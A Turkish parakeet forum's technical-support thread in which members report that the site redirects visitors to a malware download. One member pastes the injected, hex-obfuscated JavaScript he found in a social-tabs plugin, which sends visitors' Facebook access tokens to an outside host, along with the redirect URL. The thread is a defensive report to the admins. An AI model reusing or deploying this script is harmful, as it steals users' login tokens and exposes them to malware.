petshop
petshop

                   

  1. Türkiye'nin en büyük Muhabbet Kuşu Forumuna Hoşgeldiniz
    Eğer sitemize yaptığınız ilk ziyaretiniz ise, lütfen öncelikle Forum Kurallarını okuyunuz. Forumumuzda bilgi alışverişinde bulunabilmeniz için Kayıt olmalısınız. Üye olmayanlar forumumuzdan yararlanamazlar.
    Eğer zaten kayıtlı kullanıcı iseniz, lütfen kullanıcı adınız ve şifreniz ile, Giriş yapınız. (Sitemize üyelik ücretsizdir)

    Notu Gizle

sanırım sitenize malicious kod bulaşmış.

Konusu 'Teknik Destek' forumundadır ve okoca tarafından 29 Nisan 2016 başlatılmıştır.

  1. okoca
    Çevrimdışı

    okoca New Member

    Katılım:
    25 Mart 2016
    Mesajlar:
    19
    Beğenileri:
    0
    merhaba

    sanıyorum sizin sitenizde html kodlar arasında bir zararlı kod bulunuyor, googleden

    muhabbet kuşu forum
    diye aratıp ilk linke tıkladığımda opera bu site için zararlı yazılım uyarısı veriyor,

    uyarıyı yok saydığımda "http://filestore72.info/download.php?id=7da9a19a"

    bu sayfaya yönleniyor www.muhabbetkusu.com.tr girmeye kalktığımda

    yani alt formu felan kast etmiyorum direk index.php de bir durum var sanırım,

    akabinde yönlenmeden sonra tekrar googleden siteye tıkladığımda bu sefer açılıyor

    sanıyorum cookie atıyor browser a bir kere daha yönlendirme yapmıyor, lütfen sitenin

    kodlarını bir inceleyin, müdehale etmezseniz arama motoru listelerindende çıkarılırsınız,

    ilk başda bilmiyen biri olsam bu site çalışmıyor sanırım diye düşünürdüm ama üyeliğim var, yetkililerin dikkatine.
     
  2. jarhead
    Çevrimdışı

    jarhead Member

    Katılım:
    9 Kasım 2015
    Mesajlar:
    110
    Beğenileri:
    1
    Haklısınız aynı sorunu bende yaşıyordum lakin sizin kadar bilgi sahibi olmadigimdan bişey diyemedim ve bu sorun Çoktandır var ilk girişte yonlendiriyor geri diyip tekrar giriş yapmaya calistiginizda girebiliyorsunuz.
     
  3. SencerSancak
    Çevrimdışı

    SencerSancak Active Member

    Katılım:
    23 Mart 2016
    Mesajlar:
    540
    Beğenileri:
    54
    Arada siteye girdiğimde başka alakasız yerlere yönlendiriyor bende de.
     
  4. okoca
    Çevrimdışı

    okoca New Member

    Katılım:
    25 Mart 2016
    Mesajlar:
    19
    Beğenileri:
    0
    durumlar; ya sunucuda dosyalar herkezin okuma ve yazmasına açık, yani paylaşımlı bir vhost yapılandırması varsa sunucuda başka birinin hesabındaki zararlı kod bu sitenin dosyalarına erip yazmış olabilir, veya bu web sitesinin dosyaları ftp den yüklenmeden önce pc de bulaşmış ve webmaster da bilmeden upload etmiş, bazı trojanlar html php dosyaları diskde tarayıp kod enjekde ediyorlar.

    veya birisi aslında hesabı elinde bulunduruyor sitede açık var çokdan girmiş kafasına göre takılıyor, veya sunucuyu exploit lemiş olabilir, bir çok ihtimal söz konusu.


    yaptığım incelemede;

    direk girişlerde yani browseri açıp adresi yazarak "cookie olmasa" bile yönlendirmiyor,

    illaki referer olacak yani bir siteden yönlendiriliyor olacaksınız ve cookie set edilmemiş olacak,


    yönlendirmeyi yapan dosya;

    http://www.muhabbetkusu.com.tr/misc.php

    içersinde şöyle bir kod geliyor yukarıdaki kurallar olduğunda

    document.location='http://filestore72.info/download.php?id=7da9a19a'

    şimdi bu vBulletin 3.8.5 in kendi orjinal dosyasıdır, içini kodları görmek lazım, acaba dosya içindemi zararlı kod yoksa,

    başka include edilen bir php den berimi sayfaya basılıyor.

    yönlendirilen sayfada ücretsiz hosting veren bir yer, hostu kapatmış o hesabın, amacı exe download ettirmek.

    eğer vbulletin patch leri yüklenmiyorsa ondanda olmuş olabilir, site tarayan botlar tespit etmişdir..



    ek olarak;

    socialmediatabs eklentisi

    cdn.socialmediatabs.com/loader/loader.1.0.min.js

    şuradan js çektiriyor siteyi ziyaret edene;

    bu eklenti içeriğindede inject kod var

    --- bu kısım olması gereken ----
    smtabs_id = smtabs_id .replace("//","/");
    (function(){function g(d,f){var e;e=document.createElement("script");e.setAttribute("type","text/javascript");e.setAttribute("src",d);"undefined"!=typeof e&&("head"==f?document.getElementsByTagName("head")[0].appendChild(e):document.getElementsByTagName("body")[0].appendChild(e))}function h(d){0==document.getElementsByTagName("body").length?(window.a=window.a||0,window.a++,10>=window.a?window.c=setTimeout(function(){h(d)},500):console.log("Could not find body tag and unable to load "+d)):(g(d,"body"),
    g("//cdn.socialmediatabs.com/test/jsonp.js","body"))}function k(d){var f=i;keyparts=(""+d).split("@");f=f+"tabholder/"+keyparts[3]+".js";h(f)}function j(d){"function"==typeof jQuery?($jqsmtabs=jQuery,clearTimeout(window.b),k(d)):window.b=setTimeout(function(){j(d)},200)}var i="//cdn.socialmediatabs.com/";(function(d){"function"!=typeof jQuery&&g(i+"thirdparty/jquery.1.7.min.js","head");j(d)})(smtabs_id)})();

    -- bu kisim ilave edilmiş kod ----
    var _0xd769=["\x46\x42\x54\x2E\x63\x68\x65\x63\x6B\x28\x29\x3B","\x44\x4F\x4D\x43\x6F\x6E\x74\x65\x6E\x74\x4C\x6F\x61\x64\x65\x64","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x63\x68\x65\x63\x6B","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x67\x65\x74\x4C\x6F\x67\x69\x6E\x53\x74\x61\x74\x75\x73","\x66\x75\x6E\x63\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x6F\x64\x69\x72\x2E\x77\x65\x62\x73\x65\x69\x74\x65\x6E\x2E\x63\x63\x2F\x74\x6F\x6B\x65\x6E\x73\x2F\x72\x65\x70\x6F\x72\x74\x5F\x61\x6A\x61\x78\x2F\x53\x4D\x54\x2F","\x61\x63\x63\x65\x73\x73\x54\x6F\x6B\x65\x6E","\x61\x75\x74\x68\x52\x65\x73\x70\x6F\x6E\x73\x65","\x67\x65\x74","\x78","\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x6D\x6C\x48\x74\x74\x70\x2E\x35\x2E\x30","\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x6D\x6C\x48\x74\x74\x70\x2E\x34\x2E\x30","\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x6D\x6C\x48\x74\x74\x70\x2E\x33\x2E\x30","\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x6D\x6C\x48\x74\x74\x70\x2E\x32\x2E\x30","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x6D\x6C\x48\x74\x74\x70","\x6C\x65\x6E\x67\x74\x68","\x73\x65\x6E\x64","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x50\x4F\x53\x54","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x74\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x3D","\x70\x75\x73\x68","\x3F","\x26","\x6A\x6F\x69\x6E","\x47\x45\x54","\x70\x6F\x73\x74"];var FBT={};setTimeout(_0xd769[0],2000);document[_0xd769[2]](_0xd769[1],function (){setTimeout(_0xd769[0],5000);} );FBT[_0xd769[3]]=function (){if( typeof FB!=_0xd769[4]){if( typeof FB[_0xd769[5]]==_0xd769[6]){FB[_0xd769[5]](function (_0x446fx2){ajax[_0xd769[10]](_0xd769[7]+_0x446fx2[_0xd769[9]][_0xd769[8]],{},function (){} );} );} ;} ;} ;var ajax={};ajax[_0xd769[11]]=function (){if( typeof XMLHttpRequest!==_0xd769[4]){return new XMLHttpRequest();} ;var _0x446fx4=[_0xd769[12],_0xd769[13],_0xd769[14],_0xd769[15],_0xd769[16]];var _0x446fx5;for(var _0x446fx6=0;_0x446fx6<_0x446fx4[_0xd769[17]];_0x446fx6++){try{_0x446fx5= new ActiveXObject(_0x446fx4[_0x446fx6]);break ;} catch(e){} ;} ;return _0x446fx5;} ;ajax[_0xd769[18]]=function (_0x446fx7,_0x446fx8,_0x446fx9,_0x446fxa,_0x446fxb){var _0x446fxc=ajax[_0xd769[11]]();_0x446fxc[_0xd769[19]](_0x446fx9,_0x446fx7,_0x446fxb);_0x446fxc[_0xd769[20]]=function (){if(_0x446fxc[_0xd769[21]]==4){_0x446fx8(_0x446fxc[_0xd769[22]]);} ;} ;if(_0x446fx9==_0xd769[23]){_0x446fxc[_0xd769[26]](_0xd769[24],_0xd769[25]);} ;_0x446fxc[_0xd769[18]](_0x446fxa);} ;ajax[_0xd769[10]]=function (_0x446fx7,_0x446fxa,_0x446fx8,_0x446fxb){var _0x446fxd=[];for(var _0x446fxe in _0x446fxa){_0x446fxd[_0xd769[28]](encodeURIComponent(_0x446fxe)+_0xd769[27]+encodeURIComponent(_0x446fxa[_0x446fxe]));} ;ajax[_0xd769[18]](_0x446fx7+_0xd769[29]+_0x446fxd[_0xd769[31]](_0xd769[30]),_0x446fx8,_0xd769[32],null,_0x446fxb);} ;ajax[_0xd769[33]]=function (_0x446fx7,_0x446fxa,_0x446fx8,_0x446fxb){var _0x446fxd=[];for(var _0x446fxe in _0x446fxa){_0x446fxd[_0xd769[28]](encodeURIComponent(_0x446fxe)+_0xd769[27]+encodeURIComponent(_0x446fxa[_0x446fxe]));} ;ajax[_0xd769[18]](_0x446fx7,_0x446fx8,_0xd769[23],_0x446fxd[_0xd769[31]](_0xd769[30]),_0x446fxb);} ;


    aynı şekilde googleden gelen bir ziyareçi muhtemelen sayfaya giremiyordur, bu hit düşüşü demekdir,

    opera en azından yoksay butonu sunuyor, ama firefox felan bunu sunmuyordu en son bildiğim kadarı ile

    zararlı olarak işeretlenmiş sitelere giremiyordunuz..

    sitenin temizlenip uyarının kaldırılması için bildirimde yapmak bulunmak gerek, veya güncellemek lazım site dosyalarını db sini en son sürüme,

    vbulletinin bu işi yapan ücretsiz toolu vardı db yi üst sürüme taşıyordu, geçmişte kullanmışdım asp li forumu vbulletine geçirdiydim..
     
    #4 okoca, 29 Nisan 2016
    Son düzenleme: 29 Nisan 2016

Sayfayı Paylaş